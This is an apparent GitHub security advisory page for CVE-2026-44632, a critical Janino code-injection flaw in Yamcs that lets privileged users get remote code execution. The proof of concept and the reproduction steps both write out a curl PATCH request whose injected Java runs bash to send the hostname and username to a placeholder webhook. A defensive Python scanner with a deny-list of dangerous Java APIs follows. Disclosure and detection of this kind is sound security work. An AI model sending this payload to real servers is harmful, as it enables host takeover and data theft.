Critical severity · GHSA Advisory · Published May 27, 2026

Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`

CVE-2026-44632

Description

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.

Proof of Concept (PoC)

The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.

Prerequisites:

  1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime).
  2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.

Steps to Reproduce:

  1. Send an authenticated HTTP PATCH request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., copySunsensor). The payload uses java.lang.Runtime to execute a reverse shell or ping an external webhook.
curl -i -X PATCH \
  'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
  -d '{
    "action": "SET",
    "algorithm": {
      "text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
    }
  }'
  2. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to generate sun sensor data).
  3. The Yamcs server uses the Janino SimpleCompiler to compile the injected text into a Java class on the fly. Since no restrictive ClassLoader is applied, the payload is successfully compiled and executed.
  4. Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2026-44632 is a critical Server-Side Code Injection vulnerability in Yamcs that allows authenticated users holding the ChangeMissionDatabase privilege to achieve RCE via the Janino compiler, which is invoked with no sandboxing.

Vulnerability

A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory) in versions prior to 5.12.7. The application dynamically compiles and evaluates user-controlled algorithm text using the Janino SimpleCompiler without enforcing a restrictive ClassLoader or sandbox. An authenticated user with the ChangeMissionDatabase privilege can provide arbitrary Java code that is compiled and executed on the fly.

Exploitation

An attacker must have an active authentication token for a user holding the SystemPrivilege.ChangeMissionDatabase privilege and access to a running Yamcs instance with an active processor. The exploit sends an authenticated HTTP PATCH request to the MDB override endpoint (e.g., /api/mdb/myproject/realtime/algorithms/myproject/copySunsensor) with a JSON payload containing a malicious algorithm.text field. This injected text uses Java classes such as java.lang.Runtime.getRuntime().exec() to execute OS commands. The algorithm is then triggered by sending telemetry data that the algorithm depends on, causing the server to compile and execute the payload.

Impact

Successful exploitation results in Remote Code Execution (RCE) on the underlying host operating system. The attacker can execute arbitrary OS commands with the privileges of the Yamcs server process, leading to full system compromise, data exfiltration, or further lateral movement within the network [1][2].

Mitigation

The vulnerability is fixed in Yamcs version 5.12.7. Users should upgrade to this or a later release immediately [1][2]. No official workaround has been published, but restricting the ChangeMissionDatabase privilege to only trusted users can reduce the attack surface. There is no indication this CVE is listed on the CISA Known Exploited Vulnerabilities (KEV) catalog at the time of writing.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.yamcs:yamcs-core | Maven | < 5.12.7 | 5.12.7 |

Affected products (2)

  • Yamcs/Yamcs (GHSA), 2 versions: range < 5.12.7 (no CPE)

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing sandbox restriction in the Janino-based algorithm evaluation engine allows user-controlled Java code to be compiled and executed without limitation."

Attack vector

An authenticated attacker with the `SystemPrivilege.ChangeMissionDatabase` privilege sends a crafted HTTP `PATCH` request to the MDB override endpoint (e.g., `/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor`) [ref_id=1][ref_id=2]. The request body contains a malicious algorithm text that invokes `java.lang.Runtime.getRuntime().exec()` to execute arbitrary OS commands [ref_id=2]. When the Yamcs server later evaluates the algorithm (triggered by incoming telemetry data), the Janino `SimpleCompiler` compiles the injected text on the fly without a secure sandbox, executing the payload on the host operating system [ref_id=2].

Affected code

The vulnerability resides in `org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`, the algorithm evaluation engine that uses the Janino `SimpleCompiler` to dynamically compile and evaluate user-controlled algorithm text [ref_id=1][ref_id=2]. No restrictive `ClassLoader` or sandbox is applied during compilation, allowing arbitrary Java code to be executed [ref_id=2].

What the fix does

The advisory states that versions prior to 5.12.7 are affected, but no patch diff is included in the bundle [ref_id=1]. The recommended remediation is to restrict the Janino compiler with a secure `ClassLoader` or sandbox that prevents access to dangerous classes like `java.lang.Runtime`, or to disallow dynamic algorithm text from untrusted users entirely [ref_id=2].
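Until an upgrade to 5.12.7 is possible, a defender can at least screen algorithm overrides before they reach the Janino compiler, or scan API access logs for overrides that already went through. The following Python is an added example for this advisory, not Yamcs code and not the project's fix: it recognises PATCH requests to the MDB algorithm override endpoint and flags algorithm text that references process, reflection, file or network APIs. The deny-list of Java APIs and the tab-separated log format are assumptions made for the example.

```python
import json
import re

# Java APIs a telemetry algorithm should never need (assumed deny-list,
# not an exhaustive sandbox; a deny-list only catches the obvious cases).
DANGER_RE = re.compile(
    r"java\.lang\.Runtime|\bRuntime\.getRuntime\(|\bProcessBuilder\b"
    r"|Class\.forName\(|java\.lang\.reflect|java\.io\.File|java\.nio\.file"
    r"|java\.net\.|\bSystem\.exit\("
)
# MDB override endpoint for algorithms: /api/mdb/{instance}/{processor}/algorithms/...
ALGO_OVERRIDE_RE = re.compile(r"^/api/mdb/[^/]+/[^/]+/algorithms/")


def find_dangerous_apis(algorithm_text):
    """Distinct flagged API references found in a Java-expression algorithm body."""
    return sorted({m.group(0) for m in DANGER_RE.finditer(algorithm_text)})


def inspect_override(method, path, body):
    """Finding for a PATCH override whose algorithm text uses a flagged API, else None."""
    if method != "PATCH" or not ALGO_OVERRIDE_RE.match(path):
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return {"path": path, "apis": [], "note": "unparseable override body"}
    if payload.get("action") != "SET":
        return None
    text = (payload.get("algorithm") or {}).get("text", "")
    hits = find_dangerous_apis(text)
    return {"path": path, "apis": hits} if hits else None


def scan_log(lines):
    """Scan 'user<TAB>method<TAB>path<TAB>body' access-log lines (assumed format)."""
    findings = []
    for line in lines:
        user, method, path, body = line.rstrip("\n").split("\t", 3)
        finding = inspect_override(method, path, body)
        if finding:
            findings.append({"user": user, **finding})
    return findings


OVERRIDE_PATH = "/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor"
BENIGN_BODY = json.dumps({"action": "SET", "algorithm": {
    "text": "out0.setFloatValue(in0.getEngValue().getFloatValue() * 2.0f);"}})
INJECTED_BODY = json.dumps({"action": "SET", "algorithm": {
    "text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"id\"}); }"
            " catch (Exception e) {} out0.setFloatValue(1.0f);"}})
# Constructed sample log, not real Yamcs output.
SAMPLE_LOG = [f"ops\tGET\t{OVERRIDE_PATH}\t", f"ops\tPATCH\t{OVERRIDE_PATH}\t{BENIGN_BODY}",
              f"mdb-editor\tPATCH\t{OVERRIDE_PATH}\t{INJECTED_BODY}"]
```

Run `scan_log(SAMPLE_LOG)` to see the single finding for the injected override; the same `inspect_override` check can gate the request before the text is ever compiled.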

Preconditions

  • auth: Attacker must possess a valid authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
  • network: A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime) must be reachable.
  • network: The attacker must be able to send HTTP requests to the Yamcs REST API endpoint (typically port 8090).
  • input: The algorithm must be triggered by incoming telemetry data after the malicious text is injected.

Reproduction

1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint with a malicious algorithm text payload: `curl -i -X PATCH 'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' -H 'Content-Type: application/json' -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' -d '{"action": "SET", "algorithm": {"text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"}}'` [ref_id=2].
2. Trigger algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running `simulator.py` to generate sun sensor data) [ref_id=2].
3. Verify command execution by checking for an incoming HTTP request on the provided webhook URL [ref_id=2].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (2)

News mentions (0)

No linked articles in our index yet.